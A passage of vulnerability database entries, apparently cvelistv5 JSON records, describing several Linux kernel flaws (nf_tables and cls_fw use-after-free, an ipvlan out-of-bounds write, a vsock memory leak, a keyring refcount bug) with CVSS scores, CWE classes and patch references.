            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "5.9",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Kevin Rich"
        }
      ],
      "datePublic": "2023-07-20T15:21:11+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nWhen nf_tables_delrule() is flushing table rules, it is not checked whether the chain is bound and the chain\u0027s owner rule can also release the objects in certain circumstances.\n\nWe recommend upgrading past commit 6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:50:26.344Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8"
        },
        {
          "url": "https://kernel.dance/6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3777",
    "datePublished": "2023-09-06T13:50:26.344Z",
    "dateReserved": "2023-07-19T16:02:06.626Z",
    "dateUpdated": "2024-08-02T07:08:50.184Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3629
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Summary
Linux Kernel af_vsock.c vsock_connect memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.789Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211930"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.211930"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=7e97cfed9929eaabc41829c395eb0d1350fccb9d"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c. The manipulation leads to memory leak. The complexity of an attack is rather high. The exploitation appears to be difficult. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability."
        },
        {
          "lang": "de",
          "value": "In Linux Kernel wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Es geht um die Funktion vsock_connect der Datei net/vmw_vsock/af_vsock.c. Durch Manipulation mit unbekannten Daten kann eine memory leak-Schwachstelle ausgenutzt werden. Die Komplexit\u00e4t eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Als bestm\u00f6gliche Massnahme wird Patching empfohlen."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 1.4,
            "vectorString": "AV:A/AC:H/Au:S/C:N/I:N/A:P",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-401",
              "description": "CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-20T14:02:42.617Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.211930"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.211930"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=7e97cfed9929eaabc41829c395eb0d1350fccb9d"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2022-10-21T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2022-10-21T00:00:00.000Z",
          "value": "CVE reserved"
        },
        {
          "lang": "en",
          "time": "2022-10-21T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-01-03T12:44:50.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "Linux Kernel af_vsock.c vsock_connect memory leak"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3629",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.789Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4207
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity
Summary
Use-after-free in Linux kernel's net/sched: cls_fw component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:17:12.218Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76e42ae831991c828cffa8c37736ebfb831ad5ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/76e42ae831991c828cffa8c37736ebfb831ad5ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "3.18",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "valis"
        },
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Bing-Jhong Billy Jheng"
        }
      ],
      "datePublic": "2023-08-01T03:10:36+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_fw component can be exploited to achieve local privilege escalation.\n\nWhen fw_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit 76e42ae831991c828cffa8c37736ebfb831ad5ec.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:53:22.834Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76e42ae831991c828cffa8c37736ebfb831ad5ec"
        },
        {
          "url": "https://kernel.dance/76e42ae831991c828cffa8c37736ebfb831ad5ec"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_fw component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4207",
    "datePublished": "2023-09-06T13:53:22.834Z",
    "dateReserved": "2023-08-07T13:02:25.476Z",
    "dateUpdated": "2024-08-02T07:17:12.218Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3637
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BlueZ jlink.c jlink_init denial of service
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.293Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211936"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function jlink_init of the file monitor/jlink.c of the component BlueZ. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211936."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-21T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f"
        },
        {
          "url": "https://vuldb.com/?id.211936"
        }
      ],
      "title": "Linux Kernel BlueZ jlink.c jlink_init denial of service",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3637",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.293Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3090
Vulnerability from cvelistv5
Published
2023-06-28 19:06
Modified
2024-08-02 06:41
Severity
Summary
Out-of-bounds write in Linux kernel's ipvlan network driver
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T06:41:04.144Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=90cbed5247439a966b645b34eb0a2e037836ea8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/90cbed5247439a966b645b34eb0a2e037836ea8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5448"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230731-0002/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5480"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.4",
              "status": "affected",
              "version": "3.19",
              "versionType": "custom"
            }
          ]
        }
      ],
      "configurations": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "CONFIG_IPVLAN kernel config.\u003cbr\u003e"
            }
          ],
          "value": "CONFIG_IPVLAN kernel config.\n"
        }
      ],
      "datePublic": "2023-05-10T09:33:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThe out-of-bounds write is caused by missing skb-\u0026gt;cb  initialization in the ipvlan network driver. The vulnerability is reachable if\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eCONFIG_IPVLAN is enabled.\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003e\u003cbr\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eWe recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.\u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "A heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.\n\nThe out-of-bounds write is caused by missing skb-\u003ecb  initialization in the ipvlan network driver. The vulnerability is reachable if\u00a0CONFIG_IPVLAN is enabled.\n\n\nWe recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787 Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-06-28T19:16:26.617Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=90cbed5247439a966b645b34eb0a2e037836ea8e"
        },
        {
          "url": "https://kernel.dance/90cbed5247439a966b645b34eb0a2e037836ea8e"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5448"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230731-0002/"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5480"
        },
        {
          "url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Out-of-bounds write in Linux kernel\u0027s ipvlan network driver",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3090",
    "datePublished": "2023-06-28T19:06:41.221Z",
    "dateReserved": "2023-06-03T22:31:04.130Z",
    "dateUpdated": "2024-08-02T06:41:04.144Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3567
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPv6 inet6_dgram_ops race condition
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.055Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=364f997b5cfe1db0d63a390fe7c801fa2b3115f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211090"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function inet6_stream_ops/inet6_dgram_ops of the component IPv6 Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211090 is the identifier assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362 Race Condition",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=364f997b5cfe1db0d63a390fe7c801fa2b3115f6"
        },
        {
          "url": "https://vuldb.com/?id.211090"
        }
      ],
      "title": "Linux Kernel IPv6 inet6_dgram_ops race condition",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3567",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.055Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-3624
Vulnerability from cvelistv5
Published
2009-11-02 15:00
Modified
2024-08-07 06:38
Severity
Summary
The get_instantiation_keyring function in security/keys/keyctl.c in the KEYS subsystem in the Linux kernel before 2.6.32-rc5 does not properly maintain the reference count of a keyring, which allows local users to gain privileges or cause a denial of service (OOPS) via vectors involving calls to this function without specifying a keyring by ID, as demonstrated by a series of keyctl request2 and keyctl list commands.
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:38:28.323Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20091022 CVE request: kernel: get_instantiation_keyring() should inc the keyring refcount in all cases",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=oss-security\u0026m=125619420905341\u0026w=2"
          },
          {
            "name": "USN-864-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/usn-864-1"
          },
          {
            "name": "SUSE-SA:2010:001",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00000.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=21279cfa107af07ef985539ac0de2152b9cba5f5"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://twitter.com/spendergrsec/statuses/4916661870"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.32-rc5"
          },
          {
            "name": "[oss-security] 20091022 Re: CVE request: kernel: get_instantiation_keyring() should inc the keyring refcount in all cases",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=oss-security\u0026m=125624091417161\u0026w=2"
          },
          {
            "name": "37086",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37086"
          },
          {
            "name": "38017",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/38017"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-10-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The get_instantiation_keyring function in security/keys/keyctl.c in the KEYS subsystem in the Linux kernel before 2.6.32-rc5 does not properly maintain the reference count of a keyring, which allows local users to gain privileges or cause a denial of service (OOPS) via vectors involving calls to this function without specifying a keyring by ID, as demonstrated by a series of keyctl request2 and keyctl list commands."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2010-01-14T10:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[oss-security] 20091022 CVE request: kernel: get_instantiation_keyring() should inc the keyring refcount in all cases",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://marc.info/?l=oss-security\u0026m=125619420905341\u0026w=2"
        },
        {
          "name": "USN-864-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/usn-864-1"
        },
        {
          "name": "SUSE-SA:2010:001",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00000.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=21279cfa107af07ef985539ac0de2152b9cba5f5"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://twitter.com/spendergrsec/statuses/4916661870"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.32-rc5"
        },
        {
          "name": "[oss-security] 20091022 Re: CVE request: kernel: get_instantiation_keyring() should inc the keyring refcount in all cases",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://marc.info/?l=oss-security\u0026m=125624091417161\u0026w=2"
        },
        {
          "name": "37086",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37086"
        },
        {
          "name": "38017",
          "tags": [
